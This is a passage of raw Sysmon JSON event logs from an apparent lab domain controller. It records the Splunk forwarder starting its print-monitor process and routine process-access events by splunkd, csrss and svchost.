C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:56:01.941","ProcessGuid":"{E2A3D6B1-1201-5F25-0000-001022230900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:56:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6270,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:01.940\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-11DA-5F25-0000-00109AD20800}\r\nTargetProcessId: 4812\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:01.940","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-11DA-5F25-0000-00109AD20800}","TargetProcessId":"4812","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6271,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:01.940\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11DA-5F25-0000-00109AD20800}\r\nTargetProcessId: 4812\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:01.940","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11DA-5F25-0000-00109AD20800}","TargetProcessId":"4812","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:56:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6272,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:01.940\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:01.940","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6273,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:01.940\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:01.940","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6274,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:01.940\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:01.940","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6275,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:01.940\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:01.940","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6276,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:01.940\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:01.940","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6277,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:01.940\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 